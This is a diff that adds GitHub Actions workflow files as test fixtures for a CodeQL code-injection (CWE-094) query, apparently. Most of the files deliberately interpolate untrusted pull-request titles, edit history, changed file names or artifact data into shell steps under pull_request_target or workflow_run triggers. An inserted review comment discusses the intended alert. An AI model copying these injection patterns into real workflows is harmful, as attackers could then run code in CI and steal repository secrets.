--- /dev/null
+++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test1.yml
@@ -0,0 +1,29 @@
+name: Pull Request Open
+
+on:
+ pull_request_target:
+ branches:
+ - main
+ - 14.0.x
+
+ types:
+ - opened
+ - reopened
+
+jobs:
+ updateJira:
+ if: github.actor != 'dependabot[bot]'
+ runs-on: ubuntu-latest
+ steps:
+ - name: Checkout repository
+ uses: actions/checkout@v4
+
+ - name: Extract Jira Key
+ env:
+ TITLE: ${{ github.event.pull_request.title }}
+ run: echo ISSUE_KEY=$(echo "$TITLE") >> $GITHUB_ENV
+
+ - name: Sink
+ run: echo ${{ env.ISSUE_KEY }}
+
+
diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test10.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test10.yml
new file mode 100644
index 000000000000..1bc02ccd826e
--- /dev/null
+++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test10.yml
@@ -0,0 +1,568 @@ +name: Self-hosted runner (push) + +on: + workflow_run: + workflows: ["Self-hosted runner (push-caller)"] + branches: ["main"] + types: [completed] + push: + branches: + - ci_* + - ci-* + paths: + - "src/**" + - "tests/**" + - ".github/**" + - "templates/**" + - "utils/**" + repository_dispatch: + +env: + HF_HOME: /mnt/cache + TRANSFORMERS_IS_CI: yes + OMP_NUM_THREADS: 8 + MKL_NUM_THREADS: 8 + PYTEST_TIMEOUT: 60 + TF_FORCE_GPU_ALLOW_GROWTH: true + RUN_PT_TF_CROSS_TESTS: 1 + CUDA_VISIBLE_DEVICES: 0,1 + +jobs: + setup: + name: Setup + strategy: + matrix: + machine_type: [single-gpu, multi-gpu] + runs-on: ['${{ matrix.machine_type }}', nvidia-gpu, t4, push-ci] + container: + image: huggingface/transformers-all-latest-gpu-push-ci + options: --gpus 0 --shm-size "16gb" --ipc host -v /mnt/cache/.cache/huggingface:/mnt/cache/ + outputs: + matrix: ${{ steps.set-matrix.outputs.matrix }} + test_map: ${{ steps.set-matrix.outputs.test_map }} + steps: + # Necessary to get the correct branch name and commit SHA for `workflow_run` event + # We also take into account the `push` event (we might want to test some changes in a branch) + - name: Prepare custom environment variables + shell: bash + # `CI_BRANCH_PUSH`: The branch name from the push event + # `CI_BRANCH_WORKFLOW_RUN`: The name of the branch on which this workflow is triggered by `workflow_run` event + # `CI_BRANCH`: The non-empty branch name from the above two (one and only one of them is empty) + # `CI_SHA_PUSH`: The commit SHA from the push event + # `CI_SHA_WORKFLOW_RUN`: The commit SHA that triggers this workflow by `workflow_run` event + # `CI_SHA`: The non-empty commit SHA from the above two (one and only one of them is empty) + run: | + CI_BRANCH_PUSH=${{ github.event.ref }} + CI_BRANCH_PUSH=${CI_BRANCH_PUSH/'refs/heads/'/''} + CI_BRANCH_WORKFLOW_RUN=${{ github.event.workflow_run.head_branch }} + CI_SHA_PUSH=${{ github.event.head_commit.id }} + CI_SHA_WORKFLOW_RUN=${{ 
github.event.workflow_run.head_sha }} + echo $CI_BRANCH_PUSH + echo $CI_BRANCH_WORKFLOW_RUN + echo $CI_SHA_PUSH + echo $CI_SHA_WORKFLOW_RUN + [[ ! -z "$CI_BRANCH_PUSH" ]] && echo "CI_BRANCH=$CI_BRANCH_PUSH" >> $GITHUB_ENV || echo "CI_BRANCH=$CI_BRANCH_WORKFLOW_RUN" >> $GITHUB_ENV + [[ ! -z "$CI_SHA_PUSH" ]] && echo "CI_SHA=$CI_SHA_PUSH" >> $GITHUB_ENV || echo "CI_SHA=$CI_SHA_WORKFLOW_RUN" >> $GITHUB_ENV + + - name: print environment variables + run: | + echo "env.CI_BRANCH = ${{ env.CI_BRANCH }}" + echo "env.CI_SHA = ${{ env.CI_SHA }}" + + - name: Update clone using environment variables + working-directory: /transformers + run: | + echo "original branch = $(git branch --show-current)" + git fetch && git checkout ${{ env.CI_BRANCH }} + echo "updated branch = $(git branch --show-current)" + git checkout ${{ env.CI_SHA }} + echo "log = $(git log -n 1)" + + - name: Cleanup + working-directory: /transformers + run: | + rm -rf tests/__pycache__ + rm -rf tests/models/__pycache__ + rm -rf reports + + - name: Show installed libraries and their versions + working-directory: /transformers + run: pip freeze + + - name: Fetch the tests to run + working-directory: /transformers + # TODO: add `git-python` in the docker images + run: | + pip install --upgrade git-python + python3 utils/tests_fetcher.py --diff_with_last_commit | tee test_preparation.txt + + - name: Report fetched tests + uses: actions/upload-artifact@v4 + with: + name: test_fetched + path: /transformers/test_preparation.txt + + - id: set-matrix + name: Organize tests into models + working-directory: /transformers + # The `keys` is used as GitHub actions matrix for jobs, i.e. `models/bert`, `tokenization`, `pipeline`, etc. + # The `test_map` is used to get the actual identified test files under each key. 
+ # If no test to run (so no `test_map.json` file), create a dummy map (empty matrix will fail) + run: | + if [ -f test_map.json ]; then + keys=$(python3 -c 'import json; fp = open("test_map.json"); test_map = json.load(fp); fp.close(); d = list(test_map.keys()); print(d)') + test_map=$(python3 -c 'import json; fp = open("test_map.json"); test_map = json.load(fp); fp.close(); print(test_map)') + else + keys=$(python3 -c 'keys = ["dummy"]; print(keys)') + test_map=$(python3 -c 'test_map = {"dummy": []}; print(test_map)') + fi + echo $keys + echo $test_map + echo "matrix=$keys" >> $GITHUB_OUTPUT + echo "test_map=$test_map" >> $GITHUB_OUTPUT + + run_tests_single_gpu: + name: Model tests + needs: setup + # `dummy` means there is no test to run + if: contains(fromJson(needs.setup.outputs.matrix), 'dummy') != true + strategy: + fail-fast: false + matrix: + folders: ${{ fromJson(needs.setup.outputs.matrix) }} + machine_type: [single-gpu] + runs-on: ['${{ matrix.machine_type }}', nvidia-gpu, t4, push-ci] + container: + image: huggingface/transformers-all-latest-gpu-push-ci + options: --gpus 0 --shm-size "16gb" --ipc host -v /mnt/cache/.cache/huggingface:/mnt/cache/ + steps: + # Necessary to get the correct branch name and commit SHA for `workflow_run` event + # We also take into account the `push` event (we might want to test some changes in a branch) + - name: Prepare custom environment variables + shell: bash + # For the meaning of these environment variables, see the job `Setup` + run: | + CI_BRANCH_PUSH=${{ github.event.ref }} + CI_BRANCH_PUSH=${CI_BRANCH_PUSH/'refs/heads/'/''} + CI_BRANCH_WORKFLOW_RUN=${{ github.event.workflow_run.head_branch }} + CI_SHA_PUSH=${{ github.event.head_commit.id }} + CI_SHA_WORKFLOW_RUN=${{ github.event.workflow_run.head_sha }} + echo $CI_BRANCH_PUSH + echo $CI_BRANCH_WORKFLOW_RUN + echo $CI_SHA_PUSH + echo $CI_SHA_WORKFLOW_RUN + [[ ! 
-z "$CI_BRANCH_PUSH" ]] && echo "CI_BRANCH=$CI_BRANCH_PUSH" >> $GITHUB_ENV || echo "CI_BRANCH=$CI_BRANCH_WORKFLOW_RUN" >> $GITHUB_ENV + [[ ! -z "$CI_SHA_PUSH" ]] && echo "CI_SHA=$CI_SHA_PUSH" >> $GITHUB_ENV || echo "CI_SHA=$CI_SHA_WORKFLOW_RUN" >> $GITHUB_ENV + + - name: print environment variables + run: | + echo "env.CI_BRANCH = ${{ env.CI_BRANCH }}" + echo "env.CI_SHA = ${{ env.CI_SHA }}" + + - name: Update clone using environment variables + working-directory: /transformers + run: | + echo "original branch = $(git branch --show-current)" + git fetch && git checkout ${{ env.CI_BRANCH }} + echo "updated branch = $(git branch --show-current)" + git checkout ${{ env.CI_SHA }} + echo "log = $(git log -n 1)" + + - name: Reinstall transformers in edit mode (remove the one installed during docker image build) + working-directory: /transformers + run: python3 -m pip uninstall -y transformers && python3 -m pip install -e . + + - name: Echo folder ${{ matrix.folders }} + shell: bash + # For folders like `models/bert`, set an env. var. (`matrix_folders`) to `models_bert`, which will be used to + # set the artifact folder names (because the character `/` is not allowed). 
+ run: | + echo "${{ matrix.folders }}" + echo "${{ fromJson(needs.setup.outputs.test_map)[matrix.folders] }}" + matrix_folders=${{ matrix.folders }} + matrix_folders=${matrix_folders/'models/'/'models_'} + echo "$matrix_folders" + echo "matrix_folders=$matrix_folders" >> $GITHUB_ENV + + - name: NVIDIA-SMI + run: | + nvidia-smi + + - name: Environment + working-directory: /transformers + run: | + python3 utils/print_env.py + + - name: Show installed libraries and their versions + working-directory: /transformers + run: pip freeze + + - name: Run all non-slow selected tests on GPU + working-directory: /transformers + run: | + python3 -m pytest -n 2 --dist=loadfile -v --make-reports=${{ matrix.machine_type }}_tests_gpu_${{ matrix.folders }} ${{ fromJson(needs.setup.outputs.test_map)[matrix.folders] }} + + - name: Failure short reports + if: ${{ failure() }} + continue-on-error: true + run: cat /transformers/reports/${{ matrix.machine_type }}_tests_gpu_${{ matrix.folders }}/failures_short.txt + + - name: "Test suite reports artifacts: ${{ matrix.machine_type }}_run_all_tests_gpu_${{ env.matrix_folders }}_test_reports" + if: ${{ always() }} + uses: actions/upload-artifact@v4 + with: + name: ${{ matrix.machine_type }}_run_all_tests_gpu_${{ env.matrix_folders }}_test_reports + path: /transformers/reports/${{ matrix.machine_type }}_tests_gpu_${{ matrix.folders }} + + run_tests_multi_gpu: + name: Model tests + needs: setup + # `dummy` means there is no test to run + if: contains(fromJson(needs.setup.outputs.matrix), 'dummy') != true + strategy: + fail-fast: false + matrix: + folders: ${{ fromJson(needs.setup.outputs.matrix) }} + machine_type: [multi-gpu] + runs-on: ['${{ matrix.machine_type }}', nvidia-gpu, t4, push-ci] + container: + image: huggingface/transformers-all-latest-gpu-push-ci + options: --gpus all --shm-size "16gb" --ipc host -v /mnt/cache/.cache/huggingface:/mnt/cache/ + steps: + # Necessary to get the correct branch name and commit SHA for `workflow_run` 
event + # We also take into account the `push` event (we might want to test some changes in a branch) + - name: Prepare custom environment variables + shell: bash + # For the meaning of these environment variables, see the job `Setup` + run: | + CI_BRANCH_PUSH=${{ github.event.ref }} + CI_BRANCH_PUSH=${CI_BRANCH_PUSH/'refs/heads/'/''} + CI_BRANCH_WORKFLOW_RUN=${{ github.event.workflow_run.head_branch }} + CI_SHA_PUSH=${{ github.event.head_commit.id }} + CI_SHA_WORKFLOW_RUN=${{ github.event.workflow_run.head_sha }} + echo $CI_BRANCH_PUSH + echo $CI_BRANCH_WORKFLOW_RUN + echo $CI_SHA_PUSH + echo $CI_SHA_WORKFLOW_RUN + [[ ! -z "$CI_BRANCH_PUSH" ]] && echo "CI_BRANCH=$CI_BRANCH_PUSH" >> $GITHUB_ENV || echo "CI_BRANCH=$CI_BRANCH_WORKFLOW_RUN" >> $GITHUB_ENV + [[ ! -z "$CI_SHA_PUSH" ]] && echo "CI_SHA=$CI_SHA_PUSH" >> $GITHUB_ENV || echo "CI_SHA=$CI_SHA_WORKFLOW_RUN" >> $GITHUB_ENV + + - name: print environment variables + run: | + echo "env.CI_BRANCH = ${{ env.CI_BRANCH }}" + echo "env.CI_SHA = ${{ env.CI_SHA }}" + + - name: Update clone using environment variables + working-directory: /transformers + run: | + echo "original branch = $(git branch --show-current)" + git fetch && git checkout ${{ env.CI_BRANCH }} + echo "updated branch = $(git branch --show-current)" + git checkout ${{ env.CI_SHA }} + echo "log = $(git log -n 1)" + + - name: Reinstall transformers in edit mode (remove the one installed during docker image build) + working-directory: /transformers + run: python3 -m pip uninstall -y transformers && python3 -m pip install -e . + + - name: Echo folder ${{ matrix.folders }} + shell: bash + # For folders like `models/bert`, set an env. var. (`matrix_folders`) to `models_bert`, which will be used to + # set the artifact folder names (because the character `/` is not allowed). 
+ run: | + echo "${{ matrix.folders }}" + echo "${{ fromJson(needs.setup.outputs.test_map)[matrix.folders] }}" + matrix_folders=${{ matrix.folders }} + matrix_folders=${matrix_folders/'models/'/'models_'} + echo "$matrix_folders" + echo "matrix_folders=$matrix_folders" >> $GITHUB_ENV + + - name: NVIDIA-SMI + run: | + nvidia-smi + + - name: Environment + working-directory: /transformers + run: | + python3 utils/print_env.py + + - name: Show installed libraries and their versions + working-directory: /transformers + run: pip freeze + + - name: Run all non-slow selected tests on GPU + env: + MKL_SERVICE_FORCE_INTEL: 1 + working-directory: /transformers + run: | + python3 -m pytest -n 2 --dist=loadfile -v --make-reports=${{ matrix.machine_type }}_tests_gpu_${{ matrix.folders }} ${{ fromJson(needs.setup.outputs.test_map)[matrix.folders] }} + + - name: Failure short reports + if: ${{ failure() }} + continue-on-error: true + run: cat /transformers/reports/${{ matrix.machine_type }}_tests_gpu_${{ matrix.folders }}/failures_short.txt + + - name: "Test suite reports artifacts: ${{ matrix.machine_type }}_run_all_tests_gpu_${{ env.matrix_folders }}_test_reports" + if: ${{ always() }} + uses: actions/upload-artifact@v4 + with: + name: ${{ matrix.machine_type }}_run_all_tests_gpu_${{ env.matrix_folders }}_test_reports + path: /transformers/reports/${{ matrix.machine_type }}_tests_gpu_${{ matrix.folders }} + + run_tests_torch_cuda_extensions_single_gpu: + name: Torch CUDA extension tests + needs: setup + if: contains(fromJson(needs.setup.outputs.matrix), 'deepspeed') || contains(fromJson(needs.setup.outputs.matrix), 'extended') + strategy: + fail-fast: false + matrix: + machine_type: [single-gpu] + runs-on: ['${{ matrix.machine_type }}', nvidia-gpu, t4, push-ci] + container: + image: huggingface/transformers-pytorch-deepspeed-latest-gpu-push-ci + options: --gpus 0 --shm-size "16gb" --ipc host -v /mnt/cache/.cache/huggingface:/mnt/cache/ + steps: + # Necessary to get the correct 
branch name and commit SHA for `workflow_run` event + # We also take into account the `push` event (we might want to test some changes in a branch) + - name: Prepare custom environment variables + shell: bash + # For the meaning of these environment variables, see the job `Setup` + run: | + CI_BRANCH_PUSH=${{ github.event.ref }} + CI_BRANCH_PUSH=${CI_BRANCH_PUSH/'refs/heads/'/''} + CI_BRANCH_WORKFLOW_RUN=${{ github.event.workflow_run.head_branch }} + CI_SHA_PUSH=${{ github.event.head_commit.id }} + CI_SHA_WORKFLOW_RUN=${{ github.event.workflow_run.head_sha }} + echo $CI_BRANCH_PUSH + echo $CI_BRANCH_WORKFLOW_RUN + echo $CI_SHA_PUSH + echo $CI_SHA_WORKFLOW_RUN + [[ ! -z "$CI_BRANCH_PUSH" ]] && echo "CI_BRANCH=$CI_BRANCH_PUSH" >> $GITHUB_ENV || echo "CI_BRANCH=$CI_BRANCH_WORKFLOW_RUN" >> $GITHUB_ENV + [[ ! -z "$CI_SHA_PUSH" ]] && echo "CI_SHA=$CI_SHA_PUSH" >> $GITHUB_ENV || echo "CI_SHA=$CI_SHA_WORKFLOW_RUN" >> $GITHUB_ENV + + - name: print environment variables + run: | + echo "env.CI_BRANCH = ${{ env.CI_BRANCH }}" + echo "env.CI_SHA = ${{ env.CI_SHA }}" + + - name: Update clone using environment variables + working-directory: /workspace/transformers + run: | + echo "original branch = $(git branch --show-current)" + git fetch && git checkout ${{ env.CI_BRANCH }} + echo "updated branch = $(git branch --show-current)" + git checkout ${{ env.CI_SHA }} + echo "log = $(git log -n 1)" + + - name: Reinstall transformers in edit mode (remove the one installed during docker image build) + working-directory: /workspace/transformers + run: python3 -m pip uninstall -y transformers && python3 -m pip install -e . 
+ + - name: Remove cached torch extensions + run: rm -rf /github/home/.cache/torch_extensions/ + + # To avoid unknown test failures + - name: Pre build DeepSpeed *again* + working-directory: /workspace + run: | + python3 -m pip uninstall -y deepspeed + DS_BUILD_CPU_ADAM=1 DS_BUILD_FUSED_ADAM=1 python3 -m pip install deepspeed --global-option="build_ext" --global-option="-j8" --no-cache -v --disable-pip-version-check + + - name: NVIDIA-SMI + run: | + nvidia-smi + + - name: Environment + working-directory: /workspace/transformers + run: | + python utils/print_env.py + + - name: Show installed libraries and their versions + working-directory: /workspace/transformers + run: pip freeze + + - name: Run all non-slow selected tests on GPU + working-directory: /workspace/transformers + # TODO: Here we pass all tests in the 2 folders for simplicity. It's better to pass only the identified tests. + run: | + python -m pytest -n 1 --dist=loadfile -v --make-reports=${{ matrix.machine_type }}_run_torch_cuda_extensions_gpu_test_reports tests/deepspeed tests/extended + + - name: Failure short reports + if: ${{ failure() }} + continue-on-error: true + run: cat /workspace/transformers/reports/${{ matrix.machine_type }}_run_torch_cuda_extensions_gpu_test_reports/failures_short.txt + + - name: "Test suite reports artifacts: ${{ matrix.machine_type }}_run_torch_cuda_extensions_gpu_test_reports" + if: ${{ always() }} + uses: actions/upload-artifact@v4 + with: + name: ${{ matrix.machine_type }}_run_torch_cuda_extensions_gpu_test_reports + path: /workspace/transformers/reports/${{ matrix.machine_type }}_run_torch_cuda_extensions_gpu_test_reports + + run_tests_torch_cuda_extensions_multi_gpu: + name: Torch CUDA extension tests + needs: setup + if: contains(fromJson(needs.setup.outputs.matrix), 'deepspeed') || contains(fromJson(needs.setup.outputs.matrix), 'extended') + strategy: + fail-fast: false + matrix: + machine_type: [multi-gpu] + runs-on: ['${{ matrix.machine_type }}', nvidia-gpu, 
t4, push-ci] + container: + image: huggingface/transformers-pytorch-deepspeed-latest-gpu-push-ci + options: --gpus all --shm-size "16gb" --ipc host -v /mnt/cache/.cache/huggingface:/mnt/cache/ + steps: + # Necessary to get the correct branch name and commit SHA for `workflow_run` event + # We also take into account the `push` event (we might want to test some changes in a branch) + - name: Prepare custom environment variables + shell: bash + # For the meaning of these environment variables, see the job `Setup` + run: | + CI_BRANCH_PUSH=${{ github.event.ref }} + CI_BRANCH_PUSH=${CI_BRANCH_PUSH/'refs/heads/'/''} + CI_BRANCH_WORKFLOW_RUN=${{ github.event.workflow_run.head_branch }} + CI_SHA_PUSH=${{ github.event.head_commit.id }} + CI_SHA_WORKFLOW_RUN=${{ github.event.workflow_run.head_sha }} + echo $CI_BRANCH_PUSH + echo $CI_BRANCH_WORKFLOW_RUN + echo $CI_SHA_PUSH + echo $CI_SHA_WORKFLOW_RUN + [[ ! -z "$CI_BRANCH_PUSH" ]] && echo "CI_BRANCH=$CI_BRANCH_PUSH" >> $GITHUB_ENV || echo "CI_BRANCH=$CI_BRANCH_WORKFLOW_RUN" >> $GITHUB_ENV + [[ ! -z "$CI_SHA_PUSH" ]] && echo "CI_SHA=$CI_SHA_PUSH" >> $GITHUB_ENV || echo "CI_SHA=$CI_SHA_WORKFLOW_RUN" >> $GITHUB_ENV + + - name: print environment variables + run: | + echo "env.CI_BRANCH = ${{ env.CI_BRANCH }}" + echo "env.CI_SHA = ${{ env.CI_SHA }}" + + - name: Update clone using environment variables + working-directory: /workspace/transformers + run: | + echo "original branch = $(git branch --show-current)" + git fetch && git checkout ${{ env.CI_BRANCH }} + echo "updated branch = $(git branch --show-current)" + git checkout ${{ env.CI_SHA }} + echo "log = $(git log -n 1)" + + - name: Reinstall transformers in edit mode (remove the one installed during docker image build) + working-directory: /workspace/transformers + run: python3 -m pip uninstall -y transformers && python3 -m pip install -e . 
+ + - name: Remove cached torch extensions + run: rm -rf /github/home/.cache/torch_extensions/ + + # To avoid unknown test failures + - name: Pre build DeepSpeed *again* + working-directory: /workspace + run: | + python3 -m pip uninstall -y deepspeed + DS_BUILD_CPU_ADAM=1 DS_BUILD_FUSED_ADAM=1 python3 -m pip install deepspeed --global-option="build_ext" --global-option="-j8" --no-cache -v --disable-pip-version-check + + - name: NVIDIA-SMI + run: | + nvidia-smi + + - name: Environment + working-directory: /workspace/transformers + run: | + python utils/print_env.py + + - name: Show installed libraries and their versions + working-directory: /workspace/transformers + run: pip freeze + + - name: Run all non-slow selected tests on GPU + working-directory: /workspace/transformers + # TODO: Here we pass all tests in the 2 folders for simplicity. It's better to pass only the identified tests. + run: | + python -m pytest -n 1 --dist=loadfile -v --make-reports=${{ matrix.machine_type }}_run_torch_cuda_extensions_gpu_test_reports tests/deepspeed tests/extended + + - name: Failure short reports + if: ${{ failure() }} + continue-on-error: true + run: cat /workspace/transformers/reports/${{ matrix.machine_type }}_run_torch_cuda_extensions_gpu_test_reports/failures_short.txt + + - name: "Test suite reports artifacts: ${{ matrix.machine_type }}_run_torch_cuda_extensions_gpu_test_reports" + if: ${{ always() }} + uses: actions/upload-artifact@v4 + with: + name: ${{ matrix.machine_type }}_run_torch_cuda_extensions_gpu_test_reports + path: /workspace/transformers/reports/${{ matrix.machine_type }}_run_torch_cuda_extensions_gpu_test_reports + + send_results: + name: Send results to webhook + runs-on: ubuntu-22.04 + if: always() + needs: [ + setup, + run_tests_single_gpu, + run_tests_multi_gpu, + run_tests_torch_cuda_extensions_single_gpu, + run_tests_torch_cuda_extensions_multi_gpu + ] + steps: + - name: Preliminary job status + shell: bash + # For the meaning of these environment 
variables, see the job `Setup` + run: | + echo "Setup status: ${{ needs.setup.result }}" + + # Necessary to get the correct branch name and commit SHA for `workflow_run` event + # We also take into account the `push` event (we might want to test some changes in a branch) + - name: Prepare custom environment variables + shell: bash + # For the meaning of these environment variables, see the job `Setup` + run: | + CI_BRANCH_PUSH=${{ github.event.ref }} + CI_BRANCH_PUSH=${CI_BRANCH_PUSH/'refs/heads/'/''} + CI_BRANCH_WORKFLOW_RUN=${{ github.event.workflow_run.head_branch }} + CI_SHA_PUSH=${{ github.event.head_commit.id }} + CI_SHA_WORKFLOW_RUN=${{ github.event.workflow_run.head_sha }} + echo $CI_BRANCH_PUSH + echo $CI_BRANCH_WORKFLOW_RUN + echo $CI_SHA_PUSH + echo $CI_SHA_WORKFLOW_RUN + [[ ! -z "$CI_BRANCH_PUSH" ]] && echo "CI_BRANCH=$CI_BRANCH_PUSH" >> $GITHUB_ENV || echo "CI_BRANCH=$CI_BRANCH_WORKFLOW_RUN" >> $GITHUB_ENV + [[ ! -z "$CI_SHA_PUSH" ]] && echo "CI_SHA=$CI_SHA_PUSH" >> $GITHUB_ENV || echo "CI_SHA=$CI_SHA_WORKFLOW_RUN" >> $GITHUB_ENV + + - name: print environment variables + run: | + echo "env.CI_BRANCH = ${{ env.CI_BRANCH }}" + echo "env.CI_SHA = ${{ env.CI_SHA }}" + + - uses: actions/checkout@v4 + # To avoid failure when multiple commits are merged into `main` in a short period of time. + # Checking out to an old commit beyond the fetch depth will get an error `fatal: reference is not a tree: ... 
+ # (Only required for `workflow_run` event, where we get the latest HEAD on `main` instead of the event commit) + with: + fetch-depth: 20 + + - name: Update clone using environment variables + run: | + echo "original branch = $(git branch --show-current)" + git fetch && git checkout ${{ env.CI_BRANCH }} + echo "updated branch = $(git branch --show-current)" + git checkout ${{ env.CI_SHA }} + echo "log = $(git log -n 1)" + + - uses: actions/download-artifact@v4 + - name: Send message to Slack + env: + CI_SLACK_BOT_TOKEN: ${{ secrets.CI_SLACK_BOT_TOKEN }} + CI_SLACK_CHANNEL_ID: ${{ secrets.CI_SLACK_CHANNEL_ID }} + CI_SLACK_CHANNEL_ID_DAILY: ${{ secrets.CI_SLACK_CHANNEL_ID_DAILY }} + CI_SLACK_CHANNEL_DUMMY_TESTS: ${{ secrets.CI_SLACK_CHANNEL_DUMMY_TESTS }} + CI_SLACK_REPORT_CHANNEL_ID: ${{ secrets.CI_SLACK_CHANNEL_ID }} + ACCESS_REPO_INFO_TOKEN: ${{ secrets.ACCESS_REPO_INFO_TOKEN }} + CI_EVENT: push + CI_TITLE_PUSH: ${{ github.event.head_commit.message }} + CI_TITLE_WORKFLOW_RUN: ${{ github.event.workflow_run.head_commit.message }} + CI_SHA: ${{ env.CI_SHA }} + SETUP_STATUS: ${{ needs.setup.result }} + + # We pass `needs.setup.outputs.matrix` as the argument. A processing in `notification_service.py` to change + # `models/bert` to `models_bert` is required, as the artifact names use `_` instead of `/`. + run: | + pip install slack_sdk + pip show slack_sdk + python utils/notification_service.py "${{ needs.setup.outputs.matrix }}" diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test11.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test11.yml new file mode 100644 index 000000000000..dc101c769449 --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test11.yml 
@@ -0,0 +1,56 @@ +name: tests + +on: + workflow_run: + workflows: ["Tests"] + types: + - completed + +permissions: { contents: read } + +jobs: + get-artifacts: + name: Get required artifacts + runs-on: ubuntu-latest + permissions: + actions: read + statuses: write + outputs: + pr_num: ${{ steps.set-ref.outputs.pr_num }} + ref: ${{ steps.set-ref.outputs.ref }} + steps: + - name: Download and extract event file + uses: actions/download-artifact@v4 + with: + github-token: ${{ secrets.GITHUB_TOKEN }} + run-id: ${{ github.event.workflow_run.id }} + name: event_file + path: artifacts/event_file + + - name: Try to read PR number + id: set-ref + run: | + pr_num=$(jq -r '.pull_request.number' artifacts/event_file/event.json) + if [ -z "$pr_num" ] || [ "$pr_num" == "null" ]; then + pr_num="" + fi + + ref=$pr_num + if [ -z "$ref" ] || [ "$ref" == "null" ]; then + ref=${{ github.ref }} + fi + + echo "pr_num=$pr_num" >> $GITHUB_OUTPUT + echo "ref=$ref" >> $GITHUB_OUTPUT + + test2: + name: test2 + runs-on: ubuntu-latest + needs: get-artifacts + permissions: + actions: read + statuses: write + steps: + - run: echo ${{ needs.get-artifacts.outputs.pr_num }} + - run: echo ${{ needs.get-artifacts.outputs.ref }} + diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test12.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test12.yml new file mode 100644 index 000000000000..f81bef89568f --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test12.yml @@ -0,0 +1,13 @@ +name: Pull Request Open + +on: + pull_request_target: + +jobs: + test: + runs-on: ubuntu-latest + steps: + - run: echo "${{ github.event.pull_request.title || "foo" }}" + + + diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test13.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test13.yml new file mode 100644 index 000000000000..1e5c7eec177d --- /dev/null 
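Review bot: The fixture never says which of the two interpolated values is the intended finding: `pr_num` is read from `event.json` inside an artifact downloaded from the triggering `workflow_run`, whereas the fallback `ref=${{ github.ref }}` is runner-provided, and the `test2` job echoes both outputs. A comment above the `Try to read PR number` step such as `# pr_num originates in an artifact produced by the triggering run and is untrusted; ref falls back to github.ref` would make the expected alert explicit. The `[ "$ref" == "null" ]` test is also dead, since `ref=$pr_num` copies a value that the preceding `if` has already normalised from `null` to the empty string.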
+++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test13.yml @@ -0,0 +1,14 @@ +name: Pull Request Open + +on: + pull_request_target: + +jobs: + test: + runs-on: ubuntu-latest + steps: + - run: echo "${{ github.event.changes.body.from }}" + - run: echo "${{ github.event.changes.title.from }}" + - run: echo "${{ github.event.changes.head.ref.from }}" + - run: echo "${{ toJson(github.event.changes) }}" + diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test14.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test14.yml new file mode 100644 index 000000000000..6d925a82d372 --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test14.yml 
@@ -0,0 +1,51 @@ +name: Pull Request Open + +on: + pull_request_target: + +jobs: + test1: + runs-on: ubuntu-latest + steps: + - uses: actions/checkout@v2 + with: + ref: ${{ github.event.pull_request.head.sha }} + - id: changed-files + run: | + echo "files=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)" >> "$GITHUB_OUTPUT" + - run: echo "${{ steps.changed-files.outputs.files }}" + test2: + runs-on: ubuntu-latest + steps: + - uses: actions/checkout@v2 + with: + ref: ${{ github.event.pull_request.head.sha }} + - id: changed-files + run: | + FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/) + echo "files=${FILES}" >> "$GITHUB_OUTPUT" + - run: echo "${{ steps.changed-files.outputs.files }}" + test3: + runs-on: ubuntu-latest + steps: + - uses: actions/checkout@v2 + with: + ref: ${{ github.event.pull_request.head.sha }} + - id: changed-files + run: | + echo "CHANGED-FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)" >> "$GITHUB_ENV" + - run: echo "${{ env.CHANGED-FILES }}" + test4: + runs-on: ubuntu-latest + steps: + - uses: actions/checkout@v2 + with: + ref: ${{ github.event.pull_request.head.sha }} + - id: changed-files + run: | + FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/) + echo "CHANGED-FILES=${FILES}" >> "$GITHUB_ENV" + - run: echo "${{ env.CHANGED-FILES }}" + + + diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test15.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test15.yml new file mode 100644 index 000000000000..a39967760e8e --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test15.yml 
@@ -0,0 +1,38 @@ +name: Pull Request Open + +on: + pull_request_target: + +jobs: + test1: + runs-on: ubuntu-latest + steps: + - id: title + run: | + echo "title=$(jq --raw-output .pull_request.title ${GITHUB_EVENT_PATH})" >> "$GITHUB_OUTPUT" + - run: echo "${{ steps.title.outputs.title }}" + test2: + runs-on: ubuntu-latest + steps: + - id: title + run: | + PR_TITLE=$(jq --raw-output .pull_request.title ${GITHUB_EVENT_PATH}) + echo "title=$PR_TITLE" >> "$GITHUB_OUTPUT" + - run: echo "${{ steps.title.outputs.title }}" + test3: + runs-on: ubuntu-latest + steps: + - id: title + run: | + echo "TITLE=$(jq --raw-output .pull_request.title ${GITHUB_EVENT_PATH})" >> "$GITHUB_ENV" + - run: echo "${{ env.TITLE }}" + test4: + runs-on: ubuntu-latest + steps: + - id: title + run: | + PR_TITLE=$(jq --raw-output .pull_request.title ${GITHUB_EVENT_PATH}) + echo "TITLE=$PR_TITLE" >> "$GITHUB_ENV" + - run: echo "${{ env.TITLE }}" + + diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test16.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test16.yml new file mode 100644 index 000000000000..0b3002506a14 --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test16.yml 
